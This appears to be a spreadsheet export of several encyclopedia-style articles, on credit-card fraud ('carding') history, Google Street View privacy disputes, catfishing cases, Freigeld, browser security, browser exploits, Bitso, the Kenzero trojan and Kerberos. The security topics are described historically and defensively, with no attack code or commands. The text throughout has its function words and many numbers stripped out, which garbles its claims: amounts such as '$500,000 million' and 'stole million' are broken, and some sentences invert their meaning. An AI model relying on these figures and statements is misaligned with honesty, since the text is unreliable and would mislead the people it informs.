1980s, majority hacker arrests attributable carding-related activities relative maturity financial laws compared emerging computer regulations.started 1989, 1990 operation sundevil launched united states secret service crack groups involved credit card fraud illegal computer activities, highly publicised action federal government hackers time. severity crack much electronic frontier foundation formed response violation civil liberties.in mid-1990s rise dial-up accounts, aohell software became popular tool phishing stealing information credit card details internet users. such abuse exacerbated prior 1995 validate subscription credit card numbers account creation. abuse common added working password billing information" instant messenger communications. only 1997 warez phishing pushed service types attacks begin decline.december 1999 featured unusual case extortion maxim, russian 19-year-old, stole 25,000 users' card details universe demanded $100,000 destruction. when ransom paid, information leaked internet.one first books written carding, 100% internet credit card fraud protected, featured content produced "hawk" carding group "universal carders". described spring 1999 hack credit card theft cybercash, stratification carder proficiencies (script kiddie professionals) common purchases type basic phishing schemes acquire credit card data.by 1999, united states offline online credit card fraud annual losses estimated $500,000 million. 2000–2006 from early 2000s, sites like "the counterfeit library", also functioning diploma mill, grew prominence, many members going join larger cybercrime websites later years closure around september 2004.in 2001, russian speaking hackers founded carderplanet odessa would notorious forums kind.in summer 2003, separate secret service investigations arrest administrator albert gonzalez large shadowcrew, turned informant part "operation firewall". march 2004, administrator "carderplanet" disappeared gonzalez taking over. october 2004 dozens shadowcrew members busted across canada. carder's speculate usss infiltrators might detected fellow site member causing operation expedited. ultimately, closure shadowcrew carderplanet reduce degree fraud proliferation smaller sites.shadowcrew admin brett shannon johnson managed avoid arrested time, picked 2005 separate charges turned informant. continuing commit fraud informant, "operation anglerphish" embedded admins scandinaviancarding cardersmarket. when continued carding activities exposed part separate investigation 2006, briefly went caught good august year.in june 2005, credit card processing company cardsystems hacked time largest personal information breach history many stolen information making carding sites. later 2007, companies breach perpetuated albert gonzalez (who still informant time) would come public's attention stolen cards detected misused large amounts gift cards. gonzalez's 2008, intrusion heartland payment systems steal card data characterized largest ever criminal breach card data.also june 2005, uk-based carders found collaborating russian mafia arrested result national hi-tech crime unit investigation, looking eastern european crime syndicates. some time 2005, keith mularski ncfta headed sting popular english language site darkmarket.ws. survivors "operation firewall", mularski able infiltrate site taking handle "master splyntr", eastern european spammer named pavel kaminski. late 2006 site hacked butler, detected user "master splyntr" logged ncfta's offices, warning dismissed inter-forum rivalry. 2007 details operation revealed german national police, ncfta successfully penetrated forum's inner "family". october 2007, mularski announced shutting site unwanted attention fellow administrator, framed "too much attention" enforcement. several years following site closure multiple arrests made internationally.from 2004 2006, cardersmarket assimilated various rival forums marketing, hacking databases. arrested 2007, 2010 site's owner butler sentenced years prison. 2007–present since 2007 present, operation open market, operation usss targeted primarily russian language carder.su organisation, believed operating vegas. 2011, alleged site owner roman seleznev apprehended maldives enforcement 2012, identity thief david camez arrested charged unprecedented rico legislation.horohorin vladislav, identified badb november 2009 sealed indictment united states attorney's office arrested 2010 usss nice, france. vladislav created first fully automated credit card shop managed websites associates stolen credit card numbers. horohorin vladislav also known first cyber criminal promote illegal activities creating video cartoons ridiculing american card holders.in 2011, former bulgarian shadowcrew member aleksi kolarov (also known "apk") finally arrested held paraguay extradited united states 2013 face charges.in march 2012, united states secret service took kurupt.su, arrested david schrooten (also known "fortezza" "xakep") romania, extradited united states sentenced serve years federal prison. primarily role trafficking credit cards obtained hacking hackers.in june 2012, seized carding hacking forums ugnazi.com carders.org sting part 2-year investigation dubbed operation card shop setting honeypot forum carderprofit.cc.in august 2013, hacker carding forum hackbb taken part raid freedom hosting.in january 2014, fakeplastic.net closed following investigation postal service fbi, collating previously seized information tormail, shadowcrew liberty reserve. this multiple arrests prosecutions well site's closure.a 2014 report group-ib, suggested russian cybercriminals could making much $680 million year based market research.in december 2014, based carding forum closed following site hack, administrator "verto" directing users migrate evolution darknet market's forums would largest darknet market exit scam ever seen."alpha02", notorious carding guides, went found alphabay darknet market, first ever deal stolen uber accounts. site working rebuilding damage reputation markets founded carders precipitated evolution scam. meanwhile, russian carders selling details trust darknet markets high level enforcement attention; however, buyers open.ercan findikoğlu, also known "segate" "predator", others, international conspiracy, stole million hacking card issuers making fraudulent cards sentenced eight years prison federal court. findikoğlu, turkish national, russian wife, alena kovalenko, avoided capture obscuring cyber fingerprints avoiding reach american law, went germany december 2013, arrested, lost court challenge, extradited. findikoğlu, youngster honed skills cyber cafes, turkish military, masterminded three complex, global financial crimes hacking credit card processors, eliminating limits prepaid cards sending pins access codes teams cashers who, within hours withdrew cash atms. december 2012, 5,000 cashers countries withdrew million, $400,000 transactions york atms, minutes. stolen cash kicked back wire transfers deliveries turkey, romania ukraine.vladimir drinkman, cohort albert gonzalez, pleaded guilty camden, jersey, credit card numbers heartland payment systems, 7-eleven, hannaford bros, nasdaq, carrefour, jetblue, companies 2005 2012. (u.s. drinkman, 09-cr-00626, u.s. district court, district jersey (camden))in february 2018, infraud organization revealed. contemporary situation recent years, russian language forums gained dominance english language ones, former considerably adept identifying security researchers counterintelligence activities strict invitation systems. russia's lack extradition treaty united states made country somewhat safe cyber criminals, russian foreign ministry going recommend citizens travel abroad countries treaties. investigative journalist brian krebs extensively reported russian carders ongoing game mouse. also darknet market fencing identity theft internet fraud references further reading poulsen, kevin (2011). kingpin: true story butler, master hacker billion dollar cyber crime network. isbn 978-0733628382. retrieved august 2015. glenny, misha october 2012). darkmarket: hackers became mafia. isbn 9780307476449. external links http://textfiles.com/anarchy/carding</t>
  </si>
  <si>
    <t>Google Street View privacy concerns</t>
  </si>
  <si>
    <t>privacy advocates objected google street view feature, pointing photographs show people leaving strip clubs, protesters abortion clinic, sunbathers bikinis, cottagers public parks, people picking prostitutes, people engaging activities visible public property wish photographed published online. google maintains photos taken public property. however, take account street view cameras take pictures elevated position, enabling look hedges walls designed prevent areas open public view. before launching service, google removed photos domestic violence shelters, additionally allows users flag inappropriate sensitive imagery google review remove. when service first launched, process requesting image removed trivial. google changed policy make removal straightforward, since removed option request removal image, replacing option request blurring image. images potential break-ins, sunbathers, individuals entering adult bookstores have, however, remained active images widely republished.in europe, creation google street view legal jurisdictions. some european countries laws prohibiting filming without consent individual public property purpose public display.google street view blurs parts images containing number plates human faces order protect privacy anonymity. americas argentina argentina, street view cars started taking pictures four years later originally planned. initially, google planned start collecting images brazil government permits. these permits obtained september 2013. google street view cars started taking pictures, lawyer plata tried stop city october 2013, justice dismissed complaint. canada while canada, like jurisdictions, raised issue privacy concerns regarding google street view, presence google cameras canadian city march 2009 gave rise different complaint. macpherson, columnist saskatoon star-phoenix, complained march 2009, column timing imaging, protracted winter season true onset spring would cast unfavourable image saskatoon cities. "what worries loss privacy prospect presenting world highly unflattering impression canadian cities. with possible exception victoria, show well spring. google could picked inauspicious time scanning. saskatoon unfortunately typical. google record images city visually unappealing time year like photographing beautiful woman awakened six-month coma," wrote. early october 2009, first canadian cities began appear street view; several, including saskatoon, included initial roll-out. city included, calgary, included images taken summer winter. images saskatoon rolled december 2009. united states google delayed release street view baltimore-washington metropolitan area following concern expressed united states department homeland security images taken might security-sensitive areas. additionally, department defense banned google publishing street view content u.s. military bases asked google remove existing content bases. google complied order.some cities united states streets privately owned asked google remove street view images consent given. north oaks, minnesota first. case, google complied.aaron christine boring, pittsburgh couple, sued google invasion privacy. street view made photo home available online, claimed diminished value house, chosen privacy. they lost case pennsylvania court. "while easy imagine many whose property appears google's virtual maps resent privacy implications, hard believe exquisitely sensitive would suffer shame humiliation," judge ruled. since decision reversed part december 2010, magistrate judge bissoon ruled google intentional trespasser company ordered dollar plaintiffs. september 2007, street view vehicle took picture house fire gibson, arkansas. august 2008, people lived house asked google remove picture.in 2010, electronic privacy information center (epic) filed complaint federal trade commission (ftc) stating google's admitted downloading private wi-fi data constituted violation wiretap federal communications act. decided take complaint. documents subsequently obtained epic freedom information (foia) indicated, despite request congress, examine google's data private wireless networks dropping case. epic filed administrative appeal ftc, challenging decision, 2011 epic filed suit access documents ftc's decision based. asia hong kong before launch google street view hong kong, hong kong privacy commissioner personal data taken initiative inquire google street view project, ensure complies provisions personal data (privacy) ordinance hong kong consider privacy issues arise. google declares project intend compile information specific individuals whose identities ascertained. faces passers-by licence plates photographs unidentifiable blurring technology used. also, least three-month image gathering publication, prevent images used identify individual's current whereabouts. google also assures commissioner anyone objects image themselves, cars, houses children captured cameras, related image removed. commissioner concluded google street view breach hong kong privacy laws. look seriously complaint made affected individual accordance personal data (privacy) ordinance. india google started taking street view images bangalore, india, 2011. google executive promised would best avoid security concerns. however, june 2011, street view blocked bangalore security concerns police bangalore. google officials leaders bjp, ruling party karnataka, organized meeting july 2011, continue street view bangalore. google officials, however, failed convince leaders would violate privacy laws.google receive permission launch street view feature india. 27th july 2022 government india allowed street view cities india like chennai, delhi ,mumbai many others. country worried google's plans indian cities, tourist spots, hills rivers application explore 360-degree, panoramic street level imagery terrorists using maps plan terrorist attacks india. official sources said detailed analysis security agencies defense forces feel allowing google cover india would compromise country's security interest. once proposed spatial information regulation bill, 2016 comes force, issues related internet-based application would resolved india. october 2017 google talks indian government bring back street view services india. india threatened terrorist attacks, indian government likely allow google street view services. march 2018, indian government rejected google street view security concerns. however, july 2022 coverage added parts india, around delhi major cities. japan japan, google street view started august 2008 made available japanese prefectures february 2009. available street view areas depicted residential business areas, showed faces pedestrians, displayed vehicle registration plates, name plate family residence (表札, hyōsatsu) google's decision show disputes. local governments, lawyers individuals claimed google violating privacy. february 2009, google japan representatives attended meeting privacy concerns held tokyo metropolitan government facility, agreed privacy issues adequately considered. google pledged that, taking photographs street view, would future notify provinces' local government. google japan admitted notifications explanations kind already taking place countries japan, done japan aware potential privacy concerns.on 2009, google japan announced would modify cameras scan lower height 2.05 meters ground level, centimeters lower original height camera head. height intended avoid cameras view fences front homes homes. this reduced height apply immediately, areas previously visited rescanned reduced height. scans taken original height remain available replaced images. november 2011, ministry internal affairs communications issued administrative guidance google inc. collecting activity wi-fi data telecommunication requests secrecy communication, requested delete recorded data, take measures preventing recording communication data, known publicly japanese. australia australia laws prohibiting google street view. october 2010, despite this, google street view ceased operations australia, following months investigations australian authorities. however, 2011, google announced planned begin production july 2011, street view imagery australian towns cities updated. europe austria austria, street view banned shortly launch wi-fi data collected unauthorized. since lifted strict regulations place caused street view deployed despite available data. july 2018, imagery various cities austria released. june 2020, imagery across rest austria released. czech republic czech republic, street view banned september 2010 czech office personal data protection half year unsuccessful negotiation czech republic google. office described google's program taking pictures "beyond extent ordinary sight street", "disproportionately invade citizens' privacy." however, pictures taken decision (mostly 2009) remained available online; google obliged erase every picture period disputed. 2011, lifted google lowered cameras centimeters. denmark according danish media lawyer, oluf jørgensen, google's practice photographing people private property illegal. danish data authorities advised people photographed google report police.in 2010, denmark, along ireland austria, requested google delete wifi data company collected unauthorized. google complied three requests. european union data protection directive says identifiable people right data protection. 2010 demand european union would require google warn local residents sending cameras. also required google keep unblurred versions photos longer months, instead year. turn, google announced considering canceling google street view service european union unmanageable requests european commission.this requirement abolished january 2012. google instructed give advance notice online local press photographing. germany april 2009 interview german magazine focus, google's global privacy counsel peter fleischer remarked "public opposition google street view germany, though hysterical, tougher country." occasion stated project "essentially aligned concerns data privacy advocates," "specific privacy tools would developed german launch imaging continues fastest possible pace." option specific images removed would also apply locations germany. german foreign minister vice chancellor guido westerwelle said prevent it." however, interior minister thomas maizière said people "hysterical" issue called "caution introducing blanket rules allowing objections."as october 2010, 244,237 german households opted street view. google complied blurring facades corresponding street view images. this procedure misleadingly called 'pixelating' germany (german: 'verpixeln').in april 2013 google fined €145,000 illegally recording information unsecured wireless networks. greece google stopped gathering images greek cities street view service provided guarantees privacy.however, january 2010, government legalized service condition adequate privacy protection would realized. service enabled since june 2014. lithuania 2012 lithuanian state data protection inspectorate (sdpi) refused permission google street view project operate lithuania. transport minister asked inspectorate review decision. decision changed google later able take photos streets lithuania. poland 2009 polish giodo (polish: główny inspektorat ochrony danych osobowych– chief inspectorate protection personal data) expressed doubts google street view privacy, mostly concerned issues countries. however, 2010 onwards, google cars appeared polish streets consent state authorities consultation ministry sport tourism. 2011 giodo began monitoring service street view published report included non-binding demand google clearly communicate warn going take pictures certain area certain time. also proposed drivers added records persons process personal data accordance polish law. switzerland november 2009, switzerland's federal data protection information commissioner hanspeter thür announced agency would suing google street view "numerous faces vehicle number plates made sufficiently unrecognizable point view data protection". united kingdom first days launch service drew criticism privacy. images found leaving shop, vomiting another arrested. some images removed including areas around downing street.the service drew criticism belfast represented "reckless" security risk, particularly showing exteriors army bases police stations soon killing soldiers 2009 massereene barracks shooting, police officer.soon launch human rights watchdog privacy international sent formal complaint service information commissioner's office (ico), cited reports members public identifiable street view images. privacy international director simon davies said organization filed complaint "clear embarrassment damage" street view caused many britons. said street view fell short assurances given google july 2008 enabled launch, namely privacy would protected blurring faces vehicle licence plates, asked system "switched off" investigation completed. said cases google's face blurring system failed meant data used street view would fall data protection legislation, requires subjects give permission information concerning them.davies subsequently sent open letter then-google chief executive eric schmidt, accusing company briefing journalists him, claiming davies biased favour microsoft. google pointed connections microsoft data protection consultancy 80/20 thinking, davies, said davies' connections microsoft made clear public, credibility criticisms undermined fact acts consultant companies direct rivals critics google, fact davies rarely discloses press releases comments.on april 2009, information commissioner ruled although google street view carries small risk privacy invasion stopped. they ruled "there anyone taking pictures people street long person using camera harassing people". they also ruled google street view contravene data protection act, image house held street view data protection matter, data protection people's personal information.in march 2010, google forced remove images military, security intelligence installations admitting ignored signs warning photographing sites breached official secrets fears published photographs could useful terrorists. also criticism google references</t>
  </si>
  <si>
    <t>Catfishing</t>
  </si>
  <si>
    <t>catfishing deceptive activity person creates fictional persona fake identity social networking service, usually targeting specific victim. practice used financial gain, compromise victim way, intentionally upset victim, wish fulfillment. catfishing television shows produced, often featuring victims wish identify catfisher. celebrities targeted, brought press attention catfishing practices. history modern term originated 2010 american documentary catfish. documentary follows schulman, executive producer, victim catfishing. cultivated relationship thought 19-year-old girl midwestern united states. woman communicating actually 40-year-old housewife. documentary, woman's husband makes comparison woman’s behaviour mythical literal catfish shipping live fish. myth shipped catfish tanks keep active, ensuring quality cod, whereas shipped alone would become pale lethargic. this myth originated fiction writing henry nevinson (1913, essays rebellion) charles marriott (1913, catfish).the term catfishing become widely known throughout subsequent decade, thanks television series followed main star movie, yaniv (nev) schulman, helping people investigate possible catfish situations.the term also spiked popularity incident involving university notre dame football star manti te'o 2013. practice sociology catfishing thought grown popularity allows participants disassociate one's everyday identity, shielding moral obligation responsibility. this attributed online disinhibition effect, online users feel comfortable sharing information, untrue, online forum person communication.in catfishing, internet user uses fake identity persuade another person believe person portray. this often used relationships, scenario movie catfish. person catfishing uses another person's photos life facts make appear real person. often, person identity molded know pictures name used. they unaware identity used create fake relationships online. person uses catfishing order appear better version using fake identity. their primary reason appear fake person befriend person relationship sexual reasons.some online users used catfishing explore gender and/or sexual identities. known type romance scam, catfishing often employed dating websites however social media email serve scammers make initial contact. example, show catfish, based documentary, girl named sonny connects male model named jamison reality, chelsea, woman using alternative identity interact romantically women online space.financial gain another motive catfishing. 2015, three girls created fake social media profile managed steal $3,300 islamic state, terrorist group. three girls approached recruitment officer join organization. after coming contact three girls proceeded asked money travel syria. when received money, girls immediately deleted internet account pocketed cash intended personal travel.catfishing also used tactic stop criminal activity. 2004, dateline produced segment, catch predator, documented undercover cops posing minors online catch pedophiles. pedophiles would lured spaces arranged undercover officers encounter posed minor adult occur. catfishing also used tactic cyberbully someone online attacking individuals online working fake anonymous identity. since using another person's identity made identity, person trouble consequences cyberbullying cannot traced back them. dangers used attract person internet allow meet person. person catfishing lure victim place kidnapped, hurt another way. sexual predators fake identities talk teens, allowing close victim trust them. this allows predator information victim information potentially harm them. examples 2002 murder kacie woody 2007 murder carly ryan. catfishing harass others online also increased number suicides teens mental abuse involved, example 2006 suicide megan meier. signs although subjective, multiple warning signs attributed catfishing behavior. unknown person starts following messaging user person's profile picture looks fake good true. profiles dating social media sites inconsistent, example different names pictures websites. encounters opposing party starts proclaiming love, especially days weeks contact. person refuses send photos talk phone video call. legal cases first successful civil claim relating catfishing scam common world (kirat assi simran kaur bhogal) june 2021 kirat, british radio presenter, discovered victim nine year catfishing campaign perpetrated younger cousin simran, former barclays investment banker. notable instances alicia kozakiewicz: 13-year-old alicia kozakiewicz befriended believed yahoo chat room either 2000 2001. january 2002, invited kozakiewicz meet near pittsburgh, pennsylvania home. actually 38-year-old scott tyree herndon, virginia, who, coercing kozakiewicz vehicle, drove home held captive, shackled, raped tortured basement dungeon live streaming online. florida viewer recognized kozakiewicz news stories national center missing exploited children flier, gave anonymous federal bureau investigation (fbi). after tracing tyree's address, stormed house january freed kozakiewicz 4:10 kozakiewicz gone become motivational speaker, internet safety missing persons advocate, founded alicia project. kacie woody 2002, 13-year-old kacie woody (screen name: modelbehavior63), arkansas began online friendship supposedly 17-year-old named dave fagen (screen name: jazzman_df) california. "dave fagen", whose profile picture young man, actually 47-year-old david fuller mesa. fuller traveled arkansas abducted woody home night december after investigation arkansas enforcement fbi, woody fuller's bodies found next fuller's rented minivan inside guardsmart storage conway. fuller sedated woody chloroform, bound, raped shot head shooting upon enforcement's arrival. woody's friends family subsequently founded kacie woody foundation order educate parents children internet safety, case appeared investigation discovery shows "web lies" "man with van." suicide megan meier suicide megan meier october 2006 attributed lori drew, neighbor meiers mother megan's friend sarah, created fake account order cyberbully megan allegedly spreading gossip sarah. sarah several people also involved. myspace, megan received friend request supposedly 16-year-old named "josh evans", claimed recently moved nearby city, o'fallon, missouri. became friends; however, october josh began sending increasingly hurtful messages megan, last told world would better place without her. megan become upset, confronted mother, tina, signing told, bedroom. later, tina went megan's room check her, found megan hanged belt inside closet. attempts revive failed, megan pronounced dead next day, three weeks 14th birthday. about year later, scheme behind account discovered. 2008, jury indicted convicted lori violations computer fraud abuse connection incident, conviction later vacated federal judge post-trial verdict, grounds intend criminalize drew's alleged conduct. government decided appealing ruling. 2009, drew also acquitted cyberbullying united states drew. tina founded megan meier foundation, organization intended fight cyberbullying. carly ryan 2006, 14-year-old carly ryan south australia befriended began dating american-australian teen named brandon kane myspace. "kane" turned garry francis newman, january 2007 travelled melbourne attend carly's 15th birthday party give presents, posing kane's father shane, behaving erractically inappropriately, mother sonya told leave. about three weeks later, carly left house apparently sleepover friends, reported missing didn’t return home next morning, body found floating horseshoe port elliot. beaten, smothered beach sand thrown ocean drown. investigation back newman, arrested and, january 2010, found guilty carly’s murder sentenced life prison 29-year non-parole period. carly's mother, sonya ryan, founded carly ryan foundation, successfully lobbied "carly's law" enacted order protect australian minors online. thomas montgomery mary shieler thomas montgomery (screen name: marinesniper), 47-year-old married man, pretending 18-year-old male named "tommy" marines, ended love triangle mary shieler (screen name: talhotblond), middle-aged married woman, pretending 18-year-old female named "jessi", co-worker montgomery's, 22-year-old brian barrett (screen name: beefcake). result jealousy, montgomery murdered barrett, deceptions unraveled. these events covered 2009 documentary film, talhotblond subsequent movie adaptation. university virginia rape hoax story according washington post article, rolling stone university virginia rape hoax story example catfishing young woman posed online another student young romantic interest reciprocate. young woman posed made-up upperclassmen student online order stay communication love interest. lincoln lewis identity australian actor, lincoln lewis, used impostor four years. actions resulted suicide victim, point reached real lincoln lewis attended primary school together, familiar aspects life discovered exploited perpetrator. female perpetrator operated least mid-2011 arrested mid-2016, early 2019 found guilty stalking people. sweet bobby sweet bobby podcast british woman named kirat falls named bobby, turned sophisticated catfisher, investigation matter. also sock puppet account gaslighting honey trapping münchausen syndrome phishing sadfishing trojan horse alicia kozakiewicz murder kacie woody murder carly ryan suicide megan meier references external links dictionary definition catfishing wiktionary</t>
  </si>
  <si>
    <t>Freigeld</t>
  </si>
  <si>
    <t>part theory freiwirtschaft, freigeld ('free money', german pronunciation: [ˈfʁaɪɡɛlt]) monetary exchange) unit proposed silvio gesell. properties freigeld several special properties: maintained monetary authority spending-power stable inflation deflation) means printing money withdrawing money circulation. cash flow safe scheme place ensure money returned cash flow example, demurrage requiring stamps purchased periodically attached money keep valid). convertible currencies. localized certain area local currency).the name results idea incentive store hoard freigeld automatically lose value time. claimed result, interest rates could decrease zero. theory according gesell, human-produced goods subject expensive storage, whereas money not: grain loses weight, metal products rust, housing deteriorates. therefore, money supreme advantage goods. john maynard keynes renamed concept basic interest articulated gesell's book natural economic order familiar term liquidity preference. being "liquid" money great advantage anybody, much comparable amounts (past utility) product. result people even provide zero-risk, inflation-corrected credits unless certain interest rate offered. freigeld simply reduces "primordial" interest rate, estimated somewhere around absolute, order lower average interest rate value around current examples e-gold example modern private currency demurrage applied. case gold storage charge annum. demurrage associated e-gold arguably expended currency operator help cover real storage costs. bernard lietaer's terra commodity basket currency proposal similar keynes's bancor l'europa bearing demurrage charge. chiemgauer regional community currency part bavaria, using demurrage system. fiction michael ende stated concept aging money mind writing children's novel momo. also freiwirtschaft demurrage (currency) wörgl experiment references</t>
  </si>
  <si>
    <t>Browser security</t>
  </si>
  <si>
    <t>browser security application internet security browsers order protect networked data computer systems breaches privacy malware. security exploits browsers often javascript, sometimes cross-site scripting (xss) secondary payload using adobe flash. security exploits also take advantage vulnerabilities (security holes) commonly exploited browsers (including mozilla firefox, google chrome, opera, microsoft internet explorer, safari). security browsers breached following ways: operating system breached malware reading/modifying browser memory space privilege mode operating system malware running background process, reading/modifying browser memory space privileged mode main browser executable hacked browser components hacked browser plugins hacked browser network communications could intercepted outside machinethe browser aware breaches show user safe connection made. whenever browser communicates website, website, part communication, collects information browser order process formatting page delivered, nothing else). malicious code inserted website's content, worst-case scenario, website specifically designed host malicious code, vulnerabilities specific particular browser allow malicious code processes within browser application unintended ways (and remember, bits information website collects browser communication browser's identity- allowing specific vulnerabilities exploited). once attacker able processes visitor's machine, exploiting known security vulnerabilities allow attacker gain privileged access browser already running privileged access) "infected" system order perform even greater variety malicious processes activities machine even victim's whole network.breaches browser security usually purpose bypassing protections display pop-up advertising collecting personally identifiable information (pii) either internet marketing identity theft, website tracking analytics user using tools bugs, clickjacking, likejacking (where facebook's like button targeted), http cookies, zombie cookies flash cookies (local shared objects lsos); installing adware, viruses, spyware trojan horses gain access users' personal computers cracking) malware including online banking theft using man-in-the-browser attacks. depth study vulnerabilities chromium web-browser indicates that, improper input validation (cwe-20) improper access control (cwe-284) occurring root causes security vulnerabilities. furthermore, among vulnerabilities examined time study, vulnerabilities occurred chromium reusing importing vulnerable versions third party libraries. vulnerabilities browser software minimized keeping browser software updated, sufficient underlying operating system compromised, example, rootkit. some subcomponents browsers scripting, add-ons, cookies particularly vulnerable ("the confused deputy problem") also need addressed. following principle defence depth, fully patched correctly configured browser sufficient ensure browser-related security issues cannot occur. example, rootkit capture keystrokes someone logs banking website, carry man-in-the-middle attack modifying network traffic browser. hijacking spoofing used return false positives mistyped website names, subvert search results popular search engines. malware rsplug simply modifies system's configuration point rogue servers. browsers secure methods network communication help prevent attacks: dns: dnssec dnscrypt, example non-default servers google public opendns. http: http secure spdy digitally signed public certificates extended validation certificates.perimeter defenses, typically firewalls filtering proxy servers block malicious websites perform antivirus scans file downloads, commonly implemented best practice large organizations block malicious network traffic reaches browser. topic browser security grown point spawning creation entire organizations, browser exploitation framework project, creating platforms collect tools breach browser security, ostensibly order test browsers network systems vulnerabilities. plugins extensions although part browser browser plugins extensions extend attack surface, exposing vulnerabilities adobe flash player, adobe (acrobat) reader, java plugin, activex commonly exploited. researchers extensively studied security architecture various web-browsers particular relying plug-and-play designs. this study identified common vulnerability types, potential mitigations. malware also implemented browser extension, browser helper object case internet explorer. browsers like google chrome mozilla firefox block—or warn users of—insecure plugins. adobe flash august 2009 study social science research network found websites using flash also employing flash cookies, privacy policies rarely disclosed them, user controls privacy preferences lacking. most browsers' cache history delete functions affect flash player's writing local shared objects cache, user community much less aware existence function flash cookies http cookies. thus, users deleted http cookies purged browser history files caches believe purged tracking data computers fact flash browsing history remains. well manual removal, betterprivacy add-on firefox remove flash cookies. adblock plus used filter specific threats flashblock used give option allowing content otherwise trusted sites.charlie miller recommended "not install flash" computer security conference cansecwest. several security experts also recommend either install adobe flash player block password security model contents page arbitrary controlled entity owning domain named displayed address bar. https used, encryption used secure attackers access network changing page contents route. when presented password field page, user supposed look address determine whether domain name address correct place send password. example, google's single sign-on system (used e.g. youtube.com), user always check address says "https://accounts.google.com" inputting password. un-compromised browser guarantees address correct. this guarantee reason browsers generally display warning entering fullscreen mode, address would normally fullscreen website cannot make fake browser user interface fake address bar. hardware browser there attempts market hardware-based browsers running non-writable, read-only file systems. data cannot stored device media cannot overwritten, presenting clean executable time loads. first device zeusgard secure hardware browser, released late 2013. zeusgard website functional since mid-2016. another device, icloak® stik icloak website provides complete live completely replaces computer's entire operating system offers browsers read-only system. with icloak provide browser anonymous browsing well regular firefox browser non-anonymous browsing. non-secured traffic (not using https, example), could still subject man-in-the-middle alteration network traffic-based manipulations. livecd livecds, operating system non-writable source, typically come browsers part default image. original livecd image free malware, software used, including browser, load free malware every time livecd image booted. browser hardening browsing internet least-privilege user account (i.e. without administrator privileges) limits ability security exploit browser compromising whole operating system.internet explorer later allows blacklisting whitelisting activex controls, add-ons browser extensions various ways. internet explorer added "protected mode", technology hardens browser application security sandboxing feature windows vista called mandatory integrity control.google chrome provides sandbox limit page access operating system.suspected malware sites reported google, confirmed google, flagged hosting malware certain browsers.there third-party extensions plugins available harden even latest browsers, older browsers operating systems. whitelist-based software noscript block javascript adobe flash used attacks privacy, allowing users choose sites know safe adblock plus also uses whitelist filtering rules subscriptions, though software filtering list maintainers come controversy by-default allowing sites pass pre-set filters. us-cert recommends block flash using noscript. fuzzing modern browsers undergo extensive fuzzing uncover vulnerabilities. chromium code google chrome continuously fuzzed chrome security team 15,000 cores. microsoft edge internet explorer, microsoft performed fuzzed testing machine-years product development, generating billion manipulations billion html files. best practice load clean software: boot known clean known clean browser adopt adequate countermeasures cross-origin resource sharing (cors) vulnerability (example patches provided webkit-based browsers) prevent attacks third-party software: hardened browser add-on-free-browsing mode prevent manipulation: trusted secure avoid website-based exploits: employ link-checking browser plug-ins commonly found internet security software avoid malicious content: employ perimeter defenses anti-malware software also filter bubble frame injection identity driven networking internet safety network security policy application security references further reading sesterhenn, eric; wever, berend-jan; orrù, michele; vervier, markus september 2017). "browser security white paper" (pdf). x41d gmbh. heiderich, mario; inführ, alex; fäßler, fabian; krein, nikolai; kinugawa, masato november 2017). "cure53 browser security white paper" (pdf). cure53.</t>
  </si>
  <si>
    <t>Browser exploit</t>
  </si>
  <si>
    <t>browser exploit form malicious code takes advantage flaw vulnerability operating system piece software intent breach browser security alter user's browser settings without knowledge. malicious code exploit activex, html, images, java, javascript, technologies cause browser arbitrary code. symptoms users whose browsers fallen victim successful browser exploit find homepage, search page, and/or favorites changed. other signs include internet settings options within browser altered, access blocked specific functions, redirection incorrectly typed prefixes. prevention there multiple ways users protect browsers falling victim browser exploit. such things include installing firewall software, keeping software updated, cautious downloading files, opening email attachments unknown sources. notable browser exploits jailbreakme series browser based exploits used jailbreak apple's mobile operating system. uses exploit browser's parser execute unauthorised code gain access underlying operating system. also browser security internet security references external links online threats browser exploits trust</t>
  </si>
  <si>
    <t>Bitso</t>
  </si>
  <si>
    <t>bitso began global cryptocurrency exchange founded mexico. founded 2014 peters, pablo gonzalez daniel vogel. daniel vogel current chief executive officer. bitso first latin american company crypto-currency platforms regulated gibraltar financial services commission distributed ledger technology framework. history founded january 2014, peters pablo gonzalez, bitso mexico's first bitcoin exchange, also operating ripple gateway, allowing international flows pesos, dollars, bitcoin objective facilitating us-to-mexico remittances. time, exchange supported percent trading volume mexican peso/bitcoin trading pair, chief competitor time localbitcoins, handled similar volume. 2015, daniel vogel, would become ceo, joined team equal partner, bitso acquired smaller mexican cryptocurrency exchange unisend. bitso's trading volume time still quite small, 33.4 day, around us$7,300. after acquisition, unisend's jose rodriguez took role vice president payments.in 2016, bitso began selling bitcoins over-the-counter mexican convenience stores, partnership zmart group, offering bitcoins 29,000 locations. year, company closed $2.5 million round investment various investors including digital currency group, monex, variv capital, xochi ventures. time, bitso 20,000 customers processed $2.5m worth transactions week. main stated goals provide services un-banked people mexico, represents close half population. 2018, platform announced ripple's first “preferred digital asset exchanges”, along bittrex coins.ph. thomson reuters began using bitso source quotes various cryptocurrencies.in 2019, exchange 750,000 users mexico. october, ripple invested company, expand operations latin america. months earlier, bitso become first distributed ledger technology (dlt) licensed exchange latin america.in 2020, company announced surpassed million customers, percent mexicans, trade volume surged percent period eight months. also, february year, bitso officially launched operations argentina.in 2021, company launched operations brazil shortly afterwards announced series investment round lead tiger global coatue raised us$250 million, valuing company us$2.2 billion.in september 2021, company started operations salvador. references external links official website</t>
  </si>
  <si>
    <t>Kenzero</t>
  </si>
  <si>
    <t>kenzero computer trojan spread across peer-to-peer networks programmed monitor browsing history victims. history kenzero trojan first discovered november 2009, researchers think went undetected months prior initial discovery. operations kenzero attacks computers download files peer-to-peer networks (p2p). once file opened, virus locates victim's browsing history publishes online. people view file(s). references</t>
  </si>
  <si>
    <t>Kerberos (protocol)</t>
  </si>
  <si>
    <t>kerberos computer-network authentication protocol works basis tickets allow nodes communicating non-secure network prove identity another secure manner. designers aimed primarily client–server model, provides mutual authentication—both user server verify other's identity. kerberos protocol messages protected eavesdropping replay attacks. kerberos builds symmetric-key cryptography requires trusted third party, optionally public-key cryptography certain phases authentication. kerberos uses port default. protocol named character kerberos cerberus) greek mythology, ferocious three-headed guard hades. history development massachusetts institute technology (mit) developed kerberos protect network services provided project athena. protocol based earlier needham–schroeder symmetric-key protocol. several versions protocol exist; versions occurred internally mit. kerberos version primarily designed steve miller clifford neuman. published late 1980s, version also targeted project athena. neuman john kohl published version 1993 intention overcoming existing limitations security problems. version appeared 1510, made obsolete 4120 2005. authorities united states classified kerberos "auxiliary military equipment" munitions list banned export used data encryption standard (des) encryption algorithm (with 56-bit keys). kerberos implementation developed royal institute technology sweden named kth-krb (rebranded heimdal version made system available outside changed cryptography export regulations (around 2000). swedish 